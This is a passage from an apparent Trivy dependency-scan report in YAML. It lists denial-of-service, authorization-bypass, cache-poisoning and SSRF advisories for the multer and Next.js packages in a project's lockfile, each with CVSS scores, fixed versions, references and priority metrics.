sha256:3b0f6823eb0c1e72928cebbdc160db403df646f5c8b21b9a9e90eaccb686a712 + Title: 'multer: Multer: Denial of Service via malformed requests' + Description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger + a Denial of Service (DoS) by sending malformed requests, potentially causing + resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. + No known workarounds are available. + Severity: HIGH + CweIDs: *id022 + VendorSeverity: + ghsa: 3 + nvd: 3 + redhat: 3 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N + V40Score: 8.7 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://access.redhat.com/security/cve/CVE-2026-3304 + - https://cna.openjsf.org/security-advisories.html + - https://github.com/expressjs/multer + - https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee + - https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p + - https://nvd.nist.gov/vuln/detail/CVE-2026-3304 + - https://www.cve.org/CVERecord?id=CVE-2026-3304 + PublishedDate: '2026-02-27T16:16:26.38Z' + LastModifiedDate: '2026-03-19T17:28:33.81Z' + context: + sbom: + name: multer + version: 1.4.5-lts.2 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.351066666666668 + epss: 0.00019 + epss_percentile: 0.05291 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00076 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 19ed6f114225796d + ruleId: CVE-2026-3520 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'multer: Multer: Denial of Service via malformed requests' + title: CVE-2026-3520 + description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger + a Denial of Service (DoS) by sending malformed requests, potentially causing stack + overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds + are available. + remediation: https://avd.aquasec.com/nvd/cve-2026-3520 + references: [] + tags: + - vulnerability + - pkg:multer@1.4.5-lts.2 + risk: + cwe: &id023 + - CWE-674 + raw: + VulnerabilityID: CVE-2026-3520 + VendorIDs: + - GHSA-5528-5vmv-3xc2 + PkgID: multer@1.4.5-lts.2 + PkgName: multer + PkgIdentifier: + PURL: pkg:npm/multer@1.4.5-lts.2 + UID: 99f2d2a7a48c940f + InstalledVersion: 1.4.5-lts.2 + FixedVersion: 2.1.1 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3520 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:1aea2a5deada40cd424b21793dc1ffd01b2c216d423aacafc67d0013c6fd0530 + Title: 'multer: Multer: Denial of Service via malformed requests' + Description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger + a Denial of Service (DoS) by sending malformed requests, potentially causing + stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No + known workarounds are available. + Severity: HIGH + CweIDs: *id023 + VendorSeverity: + ghsa: 3 + nvd: 3 + redhat: 3 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N + V40Score: 8.7 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://access.redhat.com/security/cve/CVE-2026-3520 + - https://cna.openjsf.org/security-advisories.html + - https://github.com/expressjs/multer + - https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752 + - https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2 + - https://nvd.nist.gov/vuln/detail/CVE-2026-3520 + - https://www.cve.org/CVERecord?id=CVE-2026-3520 + PublishedDate: '2026-03-04T17:16:22.61Z' + LastModifiedDate: '2026-03-09T18:03:23.1Z' + context: + sbom: + name: multer + version: 1.4.5-lts.2 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.39586666666667 + epss: 0.00067 + epss_percentile: 0.20499 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00268 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8b483b8e54efe250 + ruleId: CVE-2025-29927 + severity: CRITICAL + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'nextjs: Authorization Bypass in Next.js Middleware' + title: CVE-2025-29927 + description: Next.js is a React framework for building full-stack web applications. + Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and + 15.2.3, it is possible to bypass authorization checks within a Next.js application, + if the authorization check occurs in middleware. If patching to a safe version + is infeasible, it is recommend that you prevent external user requests which contain + the x-middleware-subrequest header from reaching your Next.js application. This + vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3. + remediation: https://avd.aquasec.com/nvd/cve-2025-29927 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id024 + - CWE-285 + - CWE-863 + raw: + VulnerabilityID: CVE-2025-29927 + VendorIDs: + - GHSA-f82v-jwr5-mffw + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 13.5.9, 14.2.25, 15.2.3, 12.3.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-29927 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:03d8bc467ed49d9b588625219e50e54133acdb9c588237ee693b8aa0098d1007 + Title: 'nextjs: Authorization Bypass in Next.js Middleware' + Description: Next.js is a React framework for building full-stack web applications. + Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and + 15.2.3, it is possible to bypass authorization checks within a Next.js application, + if the authorization check occurs in middleware. If patching to a safe version + is infeasible, it is recommend that you prevent external user requests which + contain the x-middleware-subrequest header from reaching your Next.js application. + This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3. + Severity: CRITICAL + CweIDs: *id024 + VendorSeverity: + ghsa: 4 + redhat: 4 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + V3Score: 9.1 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + V3Score: 9.1 + References: + - http://www.openwall.com/lists/oss-security/2025/03/23/3 + - http://www.openwall.com/lists/oss-security/2025/03/23/4 + - https://access.redhat.com/security/cve/CVE-2025-29927 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2 + - https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48 + - https://github.com/vercel/next.js/releases/tag/v12.3.5 + - https://github.com/vercel/next.js/releases/tag/v13.5.9 + - https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw + - https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/ + - https://nvd.nist.gov/vuln/detail/CVE-2025-29927 + - https://security.netapp.com/advisory/ntap-20250328-0002 + - https://security.netapp.com/advisory/ntap-20250328-0002/ + - https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware + - https://www.cve.org/CVERecord?id=CVE-2025-29927 + PublishedDate: '2025-03-21T15:15:42.66Z' + LastModifiedDate: '2025-09-10T15:49:40.637Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A01:2021 + cweTop25_2024: + - id: CWE-863 + rank: 24 + category: Authorization + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 100.0 + epss: 0.92118 + epss_percentile: 0.99719 + is_kev: false + kev_due_date: null + components: + severity_score: 10 + epss_multiplier: 4.68472 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 805b9e4959b28bb7 + ruleId: CVE-2024-46982 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js Cache Poisoning + title: CVE-2024-46982 + description: 'Next.js is a React framework for building full-stack web applications. + By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic + server-side rendered route in the pages router (this does not affect the app router). + When this crafted request is sent it could coerce Next.js to cache a route that + is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` + header which some upstream CDNs may cache as well. To be potentially affected + all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using + pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` + not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, + v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce + the issue or not. There are no official or recommended workarounds for this issue, + we recommend that users patch to a safe version.' + remediation: https://avd.aquasec.com/nvd/cve-2024-46982 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id025 + - CWE-639 + raw: + VulnerabilityID: CVE-2024-46982 + VendorIDs: + - GHSA-gp8f-8m3g-qvj9 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 13.5.7, 14.2.10 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-46982 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:8ae6ee9f6abad6c253892c7eafdf3857ac92ffe851cb6c9568fa46323bbc7084 + Title: Next.js Cache Poisoning + Description: 'Next.js is a React framework for building full-stack web applications. + By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic + server-side rendered route in the pages router (this does not affect the app + router). When this crafted request is sent it could coerce Next.js to cache + a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, + stale-while-revalidate` header which some upstream CDNs may cache as well. To + be potentially affected all of the following must apply: 1. Next.js between + 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side + rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This + vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend + upgrading regardless of whether you can reproduce the issue or not. There are + no official or recommended workarounds for this issue, we recommend that users + patch to a safe version.' + Severity: HIGH + CweIDs: *id025 + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N + V3Score: 7.5 + V40Score: 8.7 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3 + - https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda + - https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9 + - https://nvd.nist.gov/vuln/detail/CVE-2024-46982 + PublishedDate: '2024-09-17T22:15:02.273Z' + LastModifiedDate: '2025-09-10T15:46:05.173Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A01:2021 + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 69.12453333333335 + epss: 0.49062 + epss_percentile: 0.97812 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 2.9624800000000002 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ea84684553ce61ab + ruleId: CVE-2024-51479 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'next.js: next: authorization bypass in Next.js' + title: CVE-2024-51479 + description: 'Next.js is a React framework for building full-stack web applications. + In affected versions if a Next.js application is performing authorization in middleware + based on pathname, it was possible for this authorization to be bypassed for pages + directly under the application''s root directory. For example: * [Not affected] + `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] + `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and + later. If your Next.js application is hosted on Vercel, this vulnerability has + been automatically mitigated, regardless of Next.js version. There are no official + workarounds for this vulnerability.' + remediation: https://avd.aquasec.com/nvd/cve-2024-51479 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id026 + - CWE-285 + - CWE-863 + raw: + VulnerabilityID: CVE-2024-51479 + VendorIDs: + - GHSA-7gfc-8cq8-jh5f + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 14.2.15 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-51479 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:ffe1fe8cd242722c48ed9d1d21d64c4678d5fece8d35a42fb15072938ea11c55 + Title: 'next.js: next: authorization bypass in Next.js' + Description: 'Next.js is a React framework for building full-stack web applications. + In affected versions if a Next.js application is performing authorization in + middleware based on pathname, it was possible for this authorization to be bypassed + for pages directly under the application''s root directory. For example: * [Not + affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not + affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` + and later. If your Next.js application is hosted on Vercel, this vulnerability + has been automatically mitigated, regardless of Next.js version. There are no + official workarounds for this vulnerability.' + Severity: HIGH + CweIDs: *id026 + VendorSeverity: + ghsa: 3 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + V3Score: 7.5 + References: + - https://access.redhat.com/security/cve/CVE-2024-51479 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b + - https://github.com/vercel/next.js/releases/tag/v14.2.15 + - https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f + - https://nvd.nist.gov/vuln/detail/CVE-2024-51479 + - https://www.cve.org/CVERecord?id=CVE-2024-51479 + PublishedDate: '2024-12-17T19:15:06.697Z' + LastModifiedDate: '2025-09-10T15:48:08.253Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A01:2021 + cweTop25_2024: + - id: CWE-863 + rank: 24 + category: Authorization + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 96.60839999999999 + epss: 0.78509 + epss_percentile: 0.99056 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 4.140359999999999 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 668e2a15050688ec + ruleId: CVE-2026-44573 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js has a Middleware / Proxy bypass in Pages Router applications using + i18n + title: CVE-2026-44573 + description: Next.js is a React framework for building full-stack web applications. + From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router + with i18n configured and middleware/proxy-based authorization can allow unauthorized + access to protected page data through locale-less /_next/data//.json + requests. In affected configurations, middleware does not run for the unprefixed + data route, allowing an attacker to retrieve SSR JSON for protected pages without + passing the intended authorization checks. This vulnerability is fixed in 15.5.16 + and 16.2.5. + remediation: https://avd.aquasec.com/nvd/cve-2026-44573 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id027 + - CWE-863 + raw: + VulnerabilityID: CVE-2026-44573 + VendorIDs: + - GHSA-36qx-fr4f-26g5 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44573 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:bd9906f4d5b485ab232b2dbc5a0fba6ec53cd6439edf9b78c2790429b6f3bb2d + Title: Next.js has a Middleware / Proxy bypass in Pages Router applications using + i18n + Description: Next.js is a React framework for building full-stack web applications. + From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router + with i18n configured and middleware/proxy-based authorization can allow unauthorized + access to protected page data through locale-less /_next/data//.json + requests. In affected configurations, middleware does not run for the unprefixed + data route, allowing an attacker to retrieve SSR JSON for protected pages without + passing the intended authorization checks. This vulnerability is fixed in 15.5.16 + and 16.2.5. + Severity: HIGH + CweIDs: *id027 + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + V3Score: 7.5 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/releases/tag/v15.5.16 + - https://github.com/vercel/next.js/releases/tag/v16.2.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5 + - https://nvd.nist.gov/vuln/detail/CVE-2026-44573 + PublishedDate: '2026-05-13T17:16:22.627Z' + LastModifiedDate: '2026-05-14T12:24:22.91Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A01:2021 + cweTop25_2024: + - id: CWE-863 + rank: 24 + category: Authorization + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.381866666666667 + epss: 0.00052 + epss_percentile: 0.1631 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00208 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6cbf7b1b47550df1 + ruleId: CVE-2026-44578 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js vulnerable to server-side request forgery in applications using + WebSocket upgrades + title: CVE-2026-44578 + description: Next.js is a React framework for building full-stack web applications. + From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the + built-in Node.js server can be vulnerable to server-side request forgery through + crafted WebSocket upgrade requests. An attacker can cause the server to proxy + requests to arbitrary internal or external destinations, which may expose internal + services or cloud metadata endpoints. Vercel-hosted deployments are not affected. + This vulnerability is fixed in 15.5.16 and 16.2.5. + remediation: https://avd.aquasec.com/nvd/cve-2026-44578 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id028 + - CWE-918 + raw: + VulnerabilityID: CVE-2026-44578 + VendorIDs: + - GHSA-c4j6-fc7j-m34r + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44578 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:4b00929401561b3189dd6335cdbb89b9957345f4d80a9420d54dbe8defe083a4 + Title: Next.js vulnerable to server-side request forgery in applications using + WebSocket upgrades + Description: Next.js is a React framework for building full-stack web applications. + From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the + built-in Node.js server can be vulnerable to server-side request forgery through + crafted WebSocket upgrade requests. An attacker can cause the server to proxy + requests to arbitrary internal or external destinations, which may expose internal + services or cloud metadata endpoints. Vercel-hosted deployments are not affected. + This vulnerability is fixed in 15.5.16 and 16.2.5. + Severity: HIGH + CweIDs: *id028 + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + V3Score: 8.6 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/releases/tag/v15.5.16 + - https://github.com/vercel/next.js/releases/tag/v16.2.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r + - https://nvd.nist.gov/vuln/detail/CVE-2026-44578 + PublishedDate: '2026-05-13T18:16:17.99Z' + LastModifiedDate: '2026-05-14T18:34:38.53Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A10:2021 + cweTop25_2024: + - id: CWE-918 + rank: 19 + category: SSRF + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 27.510933333333334 + epss: 0.04476 + epss_percentile: 0.89216 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.17904 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 091bd6d2c4384d47 + ruleId: GHSA-5j59-xgg2-r9c4 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up + title: GHSA-5j59-xgg2-r9c4 + description: "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956)\ + \ in React Server Components was incomplete and did not fully mitigate denial-of-service\ + \ conditions across all payload types. As a result, certain crafted inputs could\ + \ still trigger excessive resource consumption. \n\nThis vulnerability affects\ + \ React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle\ + \ or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when\ + \ using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\ + \nA malicious actor can send a specially crafted HTTP request to a Server Function\ + \ endpoint that, when deserialized, causes the React Server Components runtime\ + \ to enter an infinite loop. This can lead to sustained CPU consumption and cause\ + \ the affected server process to become unresponsive, resulting in a denial-of-service\ + \ condition in unpatched environments." + remediation: https://github.com/advisories/GHSA-5j59-xgg2-r9c4 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + raw: + VulnerabilityID: GHSA-5j59-xgg2-r9c4 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60, + 16.0.10, 16.1.0-canary.19 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://github.com/advisories/GHSA-5j59-xgg2-r9c4 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:c465b7761effe6b822ac2a802014aa01002d62640427a73b62a2a571e081fe24 + Title: Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up + Description: "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956)\ + \ in React Server Components was incomplete and did not fully mitigate denial-of-service\ + \ conditions across all payload types. As a result, certain crafted inputs\ + \ could still trigger excessive resource consumption. \n\nThis vulnerability\ + \ affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that\ + \ bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and\ + \ 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\ + \nA malicious actor can send a specially crafted HTTP request to a Server Function\ + \ endpoint that, when deserialized, causes the React Server Components runtime\ + \ to enter an infinite loop. This can lead to sustained CPU consumption and\ + \ cause the affected server process to become unresponsive, resulting in a denial-of-service\ + \ condition in unpatched environments." + Severity: HIGH + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4 + - https://nextjs.org/blog/security-update-2025-12-11 + - https://nvd.nist.gov/vuln/detail/CVE-2025-67779 + - https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components + - https://www.cve.org/CVERecord?id=CVE-2025-55184 + - https://www.facebook.com/security/advisories/cve-2025-67779 + PublishedDate: '2025-12-12T17:21:57Z' + LastModifiedDate: '2026-01-15T21:55:04Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.333333333333336 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2dd16d93f72241ba + ruleId: GHSA-8h8q-6873-q5fj + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js Vulnerable to Denial of Service with Server Components + title: GHSA-8h8q-6873-q5fj + description: "A vulnerability affects certain React Server Components packages for\ + \ versions 19.x and frameworks that use the affected packages, including Next.js\ + \ 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream\ + \ as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh).\ + \ \n\nA specially crafted HTTP request can be sent to any App Router Server Function\ + \ endpoint that, when deserialized, may trigger excessive CPU usage. This can\ + \ result in denial of service in unpatched environments." + remediation: https://github.com/advisories/GHSA-8h8q-6873-q5fj + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + raw: + VulnerabilityID: GHSA-8h8q-6873-q5fj + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://github.com/advisories/GHSA-8h8q-6873-q5fj + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:92e1aa37bcc2db1c15708088885b76cf9ca9d3d8c1fc2283d064ff5d037c3529 + Title: Next.js Vulnerable to Denial of Service with Server Components + Description: "A vulnerability affects certain React Server Components packages\ + \ for versions 19.x and frameworks that use the affected packages, including\ + \ Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked\ + \ upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh).\ + \ \n\nA specially crafted HTTP request can be sent to any App Router Server\ + \ Function endpoint that, when deserialized, may trigger excessive CPU usage.\ + \ This can result in denial of service in unpatched environments." + Severity: HIGH + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj + - https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx + - https://nvd.nist.gov/vuln/detail/CVE-2026-23870 + PublishedDate: '2026-05-11T14:50:27Z' + LastModifiedDate: '2026-05-11T14:50:27Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.333333333333336 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 